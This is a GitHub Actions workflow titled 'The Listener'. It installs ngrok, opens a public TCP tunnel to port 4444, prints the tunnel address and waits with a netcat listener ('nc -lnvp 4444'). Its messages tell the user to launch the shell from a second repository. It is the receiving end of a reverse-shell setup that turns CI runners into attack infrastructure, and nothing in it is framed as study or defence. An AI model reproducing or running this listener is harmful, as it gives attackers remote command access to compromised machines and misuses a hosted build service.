name: The Listener

on: [workflow_dispatch]

jobs:
  listen:
    runs-on: ubuntu-latest
    steps:
      - name: Open The Tunnel
        run: |
          curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok
          ngrok authtoken ${{ secrets.NGROK_AUTH_TOKEN }}
          ngrok tcp 4444 &

      - name: Listen for the Whisper
        run: |
          sleep 10 # Give ngrok time to connect
          echo "LISTENING POST IS LIVE. CHECK THE NGROK URL BELOW."
          curl -s http://127.0.0.1:4040/api/tunnels
          echo "NOW, GO TO YOUR SECOND REPO AND LAUNCH THE SHELL."
          nc -lnvp 4444
